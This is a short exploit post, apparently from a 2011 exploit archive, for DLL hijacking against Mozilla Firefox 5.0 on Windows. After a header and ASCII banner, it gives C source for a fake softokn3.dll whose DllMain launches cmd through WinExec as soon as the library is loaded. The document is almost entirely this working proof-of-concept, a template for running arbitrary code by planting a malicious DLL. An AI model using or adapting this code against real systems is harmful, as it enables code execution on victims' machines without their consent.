# Title: Mozilla Firefox 5.0 DLL Hijacking Exploit(softokn3.dll)
# Software:www.mozilla-europe.org/es/
# Version: 5.0
# Tested on: Windows
# Author: PoisonCode
# Published: 2011-06-23
# CVE-ID:()
_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/
#include <windows.h>
int PS()
{
WinExec("cmd", SW_NORMAL);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
PS();
return 0;
}